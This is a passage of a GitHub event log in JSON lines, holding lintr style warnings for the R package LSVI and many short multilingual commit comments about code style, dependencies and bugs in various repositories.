used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:64:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/invoercontroleData_voorwaarden.R#L64) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:21:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  mutate(  #idee is om onderstaande code te wissen zodra de databank/rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:55:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L55) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:56:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L56) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-30T11:23:51Z"}
{"id":"8037089450","type":"CommitCommentEvent","actor":{"login":"ravi2katre"},"repo":{"name":"ravi2katre/magento2"},"payload":{"comment":{"id":29885193,"position":null,"line":null,"path":null,"commit_id":"836f5e64f7cd133f76e87314a851538b46df54ff","created_at":"2018-07-30T11:24:04Z","updated_at":"2018-07-30T11:24:04Z","author_association":"OWNER","body":"pullt"}},"created_at":"2018-07-30T11:24:04Z"}
{"id":"8037115211","type":"CommitCommentEvent","actor":{"login":"webvictim"},"repo":{"name":"kaniini/antissh"},"payload":{"comment":{"id":29885279,"position":5,"line":8,"path":"antissh.conf.example","commit_id":"f6a3985fb6f24cb87ee8dfe3f013c29363cc11d6","created_at":"2018-07-30T11:30:00Z","updated_at":"2018-07-30T11:30:00Z","author_association":"NONE","body":"Shouldn't this line also end with \\r\\n as the fallback line does?"}},"created_at":"2018-07-30T11:30:00Z"}
{"id":"8037119347","type":"CommitCommentEvent","actor":{"login":"sergiu-carpov"},"repo":{"name":"CEA-LIST/Cingulata"},"payload":{"comment":{"id":29885299,"position":2,"line":5,"path":"README.md","commit_id":"8024873ed7db26c6074016a73bf3296974174fba","created_at":"2018-07-30T11:30:58Z","updated_at":"2018-07-30T11:30:58Z","author_association":"COLLABORATOR","body":"Hi @mostafanou7 ,\r\nthere's no link between Cingulata and Armadillo obfuscation tool.\r\n"}},"created_at":"2018-07-30T11:30:58Z"}
{"id":"8037121042","type":"CommitCommentEvent","actor":{"login":"anupdash1991"},"repo":{"name":"scttcper/ngx-toastr"},"payload":{"comment":{"id":29885305,"position":null,"line":null,"path":null,"commit_id":"d07fc5c8be840bbe70173edc437e3dee802767b7","created_at":"2018-07-30T11:31:21Z","updated_at":"2018-07-30T11:31:21Z","author_association":"NONE","body":"for me without adding the BrowserAnimationsModule was working fine day before yesterday. \r\nthe toastr was loading .. \r\nhowever all of a sudden the toastrs wont come up and am getting the bellow error in console.\r\n\r\n_Found the synthetic property @flyInOut. Please include either \"BrowserAnimationsModule\" or \"NoopAnimationsModule\" in your application.\r\nToastrModule:1\r\nERROR CONTEXT_\r\n\r\nnow if add BrowserAnimationsModule its giving me duplicated data :( \r\nPleae suggest"}},"created_at":"2018-07-30T11:31:21Z"}
{"id":"8037127523","type":"CommitCommentEvent","actor":{"login":"filippomortari"},"repo":{"name":"CrossRef/dul-authority-tool"},"payload":{"comment":{"id":29885312,"position":2,"line":1,"path":"test.sh","commit_id":"e41966ccfc6400e087a26078847b4443aab167e6","created_at":"2018-07-30T11:32:49Z","updated_at":"2018-07-30T11:32:49Z","author_association":"NONE","body":"as per the above comment, shouldn't `https://dul.crossref.org` be the right one?"}},"created_at":"2018-07-30T11:32:49Z"}
{"id":"8037129035","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885317,"position":4,"line":8,"path":"server/api/routes/users.js","commit_id":"ba905dde083d05003cd1a9501a55243ee3a1b2fb","created_at":"2018-07-30T11:33:10Z","updated_at":"2018-07-30T11:33:10Z","author_association":"NONE","body":"低级缺陷\r\n声明变量不要使用var"}},"created_at":"2018-07-30T11:33:10Z"}
{"id":"8037129763","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29885320,"position":10,"line":41,"path":"e_16/src/e_16_3/e_16_3.java","commit_id":"f5a20ba474151c25841121ecdaf519e722bb8ab8","created_at":"2018-07-30T11:33:20Z","updated_at":"2018-07-30T11:33:20Z","author_association":"COLLABORATOR","body":"成田\r\nコメントが修正されていないようです。"}},"created_at":"2018-07-30T11:33:20Z"}
{"id":"8037132384","type":"CommitCommentEvent","actor":{"login":"haakonnessjoen"},"repo":{"name":"monoxane/companion-module-propresenter6"},"payload":{"comment":{"id":29885327,"position":5,"line":12,"path":"package.json","commit_id":"430720f0eb2a0685dd23a7ca99708a86da753a73","created_at":"2018-07-30T11:33:56Z","updated_at":"2018-07-30T11:33:56Z","author_association":"NONE","body":"Remember to remove proInterface from your dependency list, as you do not use it any longer :)"}},"created_at":"2018-07-30T11:33:56Z"}
{"id":"8037132870","type":"CommitCommentEvent","actor":{"login":"machabaid"},"repo":{"name":"VivianSolide/interact"},"payload":{"comment":{"id":29885329,"position":13,"line":13,"path":"style.css","commit_id":"f3f8f33ceeaad9a0a5b59bfe82284f13827fcd91","created_at":"2018-07-30T11:34:02Z","updated_at":"2018-07-30T11:34:02Z","author_association":"NONE","body":"banner:\r\n\r\nfont-size: 83px;\r\nfont-family: 'Crimson Text', serif;\r\nfont-weight: 500;\r\nletter-spacing: -0.08em;\r\ncolor: #000;\r\nposition: absolute;\r\nwidth: 100%;\r\nheight: 100%;\r\ntext-decoration: underline;\r\nmargin-top: -24px;\r\nline-height: 104px;\r\ntext-align: center;"}},"created_at":"2018-07-30T11:34:02Z"}
{"id":"8037135521","type":"CommitCommentEvent","actor":{"login":"1fbff5f83b23d39d38b1dfcb4cac8d9b"},"repo":{"name":"yogstation13/Yogstation-TG"},"payload":{"comment":{"id":29885334,"position":2,"line":1,"path":"_maps/shuttles/whiteship_miner.dmm","commit_id":"b52635f8630a47c48c25d3ce5d33d9831e9c934b","created_at":"2018-07-30T11:34:36Z","updated_at":"2018-07-30T11:34:36Z","author_association":"CONTRIBUTOR","body":"Unlisted changes"}},"created_at":"2018-07-30T11:34:36Z"}
{"id":"8037140852","type":"CommitCommentEvent","actor":{"login":"rake-inc"},"repo":{"name":"ehough/docker-nfs-server"},"payload":{"comment":{"id":29885352,"position":7,"line":98,"path":"README.md","commit_id":"898bc38f1ff95e4d4ec31d1fe4958c167465a605","created_at":"2018-07-30T11:35:48Z","updated_at":"2018-07-30T11:35:48Z","author_association":"NONE","body":"Couldn't find the image. Please give a valid image."}},"created_at":"2018-07-30T11:35:48Z"}
{"id":"8037143822","type":"CommitCommentEvent","actor":{"login":"boennecd"},"repo":{"name":"marjoleinF/pre"},"payload":{"comment":{"id":29885360,"position":null,"line":null,"path":null,"commit_id":"1fb93e0e19151d763304c9e86563015f682f5f52","created_at":"2018-07-30T11:36:31Z","updated_at":"2018-07-30T11:36:31Z","author_association":"COLLABORATOR","body":"I get the following errors when I run the tests\r\n\r\n![strange_stuff](https://user-images.githubusercontent.com/8993362/43395140-57a5e3bc-93fd-11e8-8982-788ec9f5b028.PNG)\r\n\r\nHowever, I get the same errors when I run the tests with 183b16f540910a8d3dd060c424c2e93d3c554b97. Thus, I gather it is not an issue with the merge."}},"created_at":"2018-07-30T11:36:31Z"}
{"id":"8037146872","type":"CommitCommentEvent","actor":{"login":"dfpasdel"},"repo":{"name":"dfpasdel/Intelligent_EMS"},"payload":{"comment":{"id":29885373,"position":null,"line":null,"path":null,"commit_id":"6dfb213615af75870a8515bc29d3f066f117a80a","created_at":"2018-07-30T11:37:11Z","updated_at":"2018-07-30T11:37:11Z","author_association":"OWNER","body":"The code at this point is the one which has been presented on July 30th by David during a short project review with Mehdi and Praveen."}},"created_at":"2018-07-30T11:37:11Z"}
{"id":"8037151428","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885383,"position":102,"line":66,"path":"server/graphql/proxy/project.js","commit_id":"ab27f48563c63b38b77c171cb8138530b95bba07","created_at":"2018-07-30T11:38:14Z","updated_at":"2018-07-30T11:38:14Z","author_association":"NONE","body":"建议\r\n一行过长，建议参数换行"}},"created_at":"2018-07-30T11:38:14Z"}
{"id":"8037155697","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885397,"position":119,"line":83,"path":"server/graphql/proxy/project.js","commit_id":"ab27f48563c63b38b77c171cb8138530b95bba07","created_at":"2018-07-30T11:39:15Z","updated_at":"2018-07-30T11:39:15Z","author_association":"NONE","body":"建议\r\n两个没有关联的请求，可以并行请求，而不是同步阻塞执行"}},"created_at":"2018-07-30T11:39:15Z"}
{"id":"8037155897","type":"CommitCommentEvent","actor":{"login":"pgroot"},"repo":{"name":"pgroot/express-swagger-generator"},"payload":{"comment":{"id":29885398,"position":36,"line":233,"path":"lib/swagger.js","commit_id":"af6743f75938922834ae6c2e49ed15848688623f","created_at":"2018-07-30T11:39:17Z","updated_at":"2018-07-30T11:39:17Z","author_association":"OWNER","body":"fixed"}},"created_at":"2018-07-30T11:39:17Z"}
{"id":"8037156601","type":"CommitCommentEvent","actor":{"login":"shawnchain"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29885399,"position":33,"line":244,"path":"SerialController.cpp","commit_id":"40db88d5f8c7fd35129d7131d2f42a773b0a1889","created_at":"2018-07-30T11:39:27Z","updated_at":"2018-07-30T11:39:27Z","author_association":"CONTRIBUTOR","body":"checkout #445 for the possible fix."}},"created_at":"2018-07-30T11:39:27Z"}
{"id":"8037159761","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885404,"position":17,"line":17,"path":"CSharpPT9/1_FileStreamEEncoding.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:40:10Z","updated_at":"2018-07-30T11:40:10Z","author_association":"NONE","body":"precisa ser absoluto? nao da pra ser relativo ao running point da app assim nao obriga ninguem a ter diretorio tempo?"}},"created_at":"2018-07-30T11:40:10Z"}
{"id":"8037160339","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885405,"position":141,"line":105,"path":"server/graphql/proxy/project.js","commit_id":"ab27f48563c63b38b77c171cb8138530b95bba07","created_at":"2018-07-30T11:40:17Z","updated_at":"2018-07-30T11:40:17Z","author_association":"NONE","body":"建议\r\neslint 没有生效，没有遵循代码规范"}},"created_at":"2018-07-30T11:40:17Z"}
{"id":"8037160725","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885406,"position":36,"line":36,"path":"CSharpPT9/1_FileStreamEEncoding.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:40:22Z","updated_at":"2018-07-30T11:40:22Z","author_association":"NONE","body":"vai ter que discutir chjarset aqui ne"}},"created_at":"2018-07-30T11:40:22Z"}
{"id":"8037162193","type":"CommitCommentEvent","actor":{"login":"monoxane"},"repo":{"name":"monoxane/companion-module-propresenter6"},"payload":{"comment":{"id":29885409,"position":5,"line":12,"path":"package.json","commit_id":"430720f0eb2a0685dd23a7ca99708a86da753a73","created_at":"2018-07-30T11:40:43Z","updated_at":"2018-07-30T11:40:43Z","author_association":"OWNER","body":"Done, thanks for reminding me"}},"created_at":"2018-07-30T11:40:43Z"}
{"id":"8037162906","type":"CommitCommentEvent","actor":{"login":"lukasz-golebiewski"},"repo":{"name":"rchain/rchain"},"payload":{"comment":{"id":29885412,"position":30,"line":26,"path":"docker/node/prometheus/prometheus.yml","commit_id":"b481ca11db9dac726d36169811d8b6ec3d516d65","created_at":"2018-07-30T11:40:53Z","updated_at":"2018-07-30T11:40:53Z","author_association":"COLLABORATOR","body":"This change conflicts with https://github.com/rchain/rchain/pull/1199. We won't be able to display COMM events per second with such scrape interval"}},"created_at":"2018-07-30T11:40:53Z"}
{"id":"8037167140","type":"CommitCommentEvent","actor":{"login":"wsdfz"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29885421,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-30T11:41:52Z","updated_at":"2018-07-30T11:41:52Z","author_association":"CONTRIBUTOR","body":"在做着新版，估计还得几天才能出。"}},"created_at":"2018-07-30T11:41:52Z"}
{"id":"8037173183","type":"CommitCommentEvent","actor":{"login":"afandian"},"repo":{"name":"CrossRef/dul-authority-tool"},"payload":{"comment":{"id":29885455,"position":2,"line":1,"path":"test.sh","commit_id":"e41966ccfc6400e087a26078847b4443aab167e6","created_at":"2018-07-30T11:43:17Z","updated_at":"2018-07-30T11:43:17Z","author_association":"MEMBER","body":"Thanks, that was an error."}},"created_at":"2018-07-30T11:43:17Z"}
{"id":"8037173473","type":"CommitCommentEvent","actor":{"login":"afandian"},"repo":{"name":"CrossRef/dul-authority-tool"},"payload":{"comment":{"id":29885462,"position":5,"line":62,"path":"README.md","commit_id":"e41966ccfc6400e087a26078847b4443aab167e6","created_at":"2018-07-30T11:43:21Z","updated_at":"2018-07-30T11:43:21Z","author_association":"MEMBER","body":"Thanks, that was an error."}},"created_at":"2018-07-30T11:43:21Z"}
{"id":"8037184081","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29885510,"position":null,"line":null,"path":null,"commit_id":"09dff73d26b2fcfeb273c8c12b6f4c7421018d0a","created_at":"2018-07-30T11:45:43Z","updated_at":"2018-07-30T11:45:43Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://00a39d79.ngrok.io/ui#review:id=27)"}},"created_at":"2018-07-30T11:45:43Z"}
{"id":"8037184903","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29885512,"position":7,"line":25,"path":"edu_server/edu_server/urls.py","commit_id":"4f235a9554e273eec4001bf3de1c11014759413a","created_at":"2018-07-30T11:45:55Z","updated_at":"2018-07-30T11:45:55Z","author_association":"COLLABORATOR","body":"We need to change API here. It's definitely bad idea to depend on type of parameter. I'd suggest to change  \"update_course\" url."}},"created_at":"2018-07-30T11:45:55Z"}
{"id":"8037185965","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29885516,"position":6,"line":142,"path":"src/operator/nn/activation.cc","commit_id":"4cd4ae85e327d2bbe852aa1f7e8798593e58fcff","created_at":"2018-07-30T11:46:09Z","updated_at":"2018-07-30T11:46:09Z","author_association":"CONTRIBUTOR","body":"Sorry, i was talking about this line. Seems like the reference got cut off @KellenSunderland"}},"created_at":"2018-07-30T11:46:09Z"}
{"id":"8037187196","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885522,"position":37,"line":37,"path":"server/graphql/proxy/commit.js","commit_id":"7007964f4efb837707e7f1608924981cb8fc803a","created_at":"2018-07-30T11:46:25Z","updated_at":"2018-07-30T11:46:25Z","author_association":"NONE","body":"建议\r\n一行代码过长，建议换行"}},"created_at":"2018-07-30T11:46:25Z"}
{"id":"8037187285","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29885523,"position":13,"line":13,"path":"kennsyuu1/src/kennsyuu1/E1_1_kouzou.java","commit_id":"b26ace2ffb3fda206a69021229bbb16ef1c1f5bb","created_at":"2018-07-30T11:46:26Z","updated_at":"2018-07-30T11:46:26Z","author_association":"COLLABORATOR","body":"成田\r\n問題文からセミコロンが欠如しているものを提出してください。\r\nまた、エラーの内容を結果として提出していただきたいです。"}},"created_at":"2018-07-30T11:46:26Z"}
